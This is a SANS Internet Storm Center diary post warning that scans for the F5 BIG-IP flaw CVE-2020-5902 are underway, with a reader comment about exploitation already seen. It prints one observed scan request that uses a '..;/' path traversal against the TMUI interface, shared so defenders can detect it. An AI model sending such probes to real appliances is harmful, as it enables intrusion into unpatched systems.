Threat Level: green Handler on Duty: Yee Ching Tok

SANS ISC: CVE-2020-5902 F5 BIG-IP Exploitation Attempt - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CVE-2020-5902 F5 BIG-IP Exploitation Attempt

A quick heads-up: we are seeing scans for F5 BIG-IP's vulnerability CVE-2020-5902.

They look like this (Host header redacted):

GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1
Host:x.x.x.x
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Here is a sigma rule for CVE-2020-5902.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

 DidierStevens

638 Posts
ISC Handler
Jul 5th 2020
Thread locked Subscribe Jul 5th 2020
1 year ago
We've already seen exploitation since Friday - https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/
 Anonymous
Quote Jul 5th 2020
1 year ago

Sign Up for Free or Log In to start participating in the conversation!